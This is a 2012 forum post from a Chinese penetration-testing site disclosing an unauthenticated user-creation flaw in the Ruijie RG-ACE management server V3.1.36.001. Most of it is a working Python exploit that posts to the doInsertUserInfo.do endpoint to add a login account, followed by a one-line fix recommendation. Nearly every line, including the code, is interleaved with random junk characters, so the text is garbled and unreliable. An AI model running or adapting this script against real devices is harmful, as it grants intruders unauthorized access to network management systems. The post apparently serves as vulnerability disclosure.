中国网络渗透测试联盟

标题: 锐捷应用控制引擎管理服务器可以增加用户 [打印本页]

作者: admin    时间: 2012-12-10 10:16
标题: 锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低): S) P. H" D: V4 q

1 _+ ?! }! w* Z; j/ b% e! \) ^7 K! T* X
测试的具体版本是
) d5 g( p0 M; {3 X' K3 D( O9 d' D, r产品名称: 锐捷应用控制引擎; Z. c" }8 L6 A7 S6 N7 S( i  K
版本号: 3.1.36.001 TC
& V3 R4 k3 ~8 I6 l2 n编译时间: 201104291730+ d4 X9 S; P9 L: t) |) N

8 k( g% {/ p2 d# G9 \& k. N% s8 [# r
漏洞证明:" f: ^  _. ^. I2 r9 z5 {
( c; ]2 A6 C$ T1 O4 P: k/ Z
: @% ^3 o+ V: p, U* M1 B) d

& c9 A' }' ~& K; ~3 I9 y* r
4 H* Z7 E+ l7 u( t- Z' ^  l' g  e  C7 a2 y$ z' ~8 Z9 F7 P
6 ]1 J8 b+ d. e+ d- H3 g" b+ @9 p& W& N
执行脚本5 d3 N1 _- p0 u! F! g- C/ s% G
#! /usr/bin/env python
2 l+ e& g. q# i  c#coding=gbk2 s5 c$ `5 ]9 h7 w( H- z; Y5 }
#RG-ACE管理服务器 V3.1.36.001
0 s% X$ G6 Z9 J0 ?$ I8 fimport urllib2, urllib,cookielib  @# f: z" _  z: u( V  o4 e
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP% Q( p. \  q' v" |
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))& C) W6 u6 b+ R) u0 j6 |8 f
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
! G4 X: n  l* `- Ppost=(("event","userManager.doInsertUserInfo"),
2 ^7 b" g. ^3 o( X4 z("useractionname","addButtonValue"),0 Q9 g4 d$ I8 K0 ]+ {
("useropermanager","userManager"),' M3 e6 ], U" E
("userName","t"), #######账号自己加8 N8 J7 r! Q1 E, Y: g/ p
("pwd","aaaaaa"),######密码自己加' B6 A+ r& g/ W6 l6 d
("trueName","ad"),
/ ]/ \" V7 p. G" J("email",""),
9 ~% e3 ]7 w6 ?1 |9 k8 S( K3 V7 V("mobilePhone",""),
) [) r1 r" G* }' d("officePhone",""),4 [& b/ p, j& ^' B
("addr",""),* C. F' q4 K  \4 h# g1 K
("submit","确定"))
7 V- N, B( I% W1 Q* w! j4 L* Q3 q; `! Uurllib2.install_opener(opener)
* a* N4 {, G0 l" n: Mp=urllib2.urlopen(url, urllib.urlencode(post)).read()
, R: O! J* f( z, u1 \print "Done", k; f& j5 a" T% L3 y' E

* w2 V7 d; A9 n登录,连接设备1 ^5 w& _+ G/ z. J
/ |9 x. q8 B0 v) t: Z# q
) H: i# P1 [4 X# e$ C" l
; ^& M* Q- m9 d& X) Q  C
. n9 _* O' j% m9 U6 D

! {0 Q4 J$ F" D默认的管理员admin权限更大点* m3 e. ]; x8 y# @7 s3 u5 L+ T
( X: O) I% N' R; J
4 h* K. d9 n) [4 H

/ G; z5 r) l9 j1 V" P# ^ 7 G5 f9 b$ _: O* h) E) t" Q

, z" c% Q% t4 Y! Z修复方案:% z( o, q. y- M! y1 n6 ?0 g
加强对接口的权限验证
5 m- E' x) s7 O$ E
, M7 D) r! ~" ~% E# ]




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2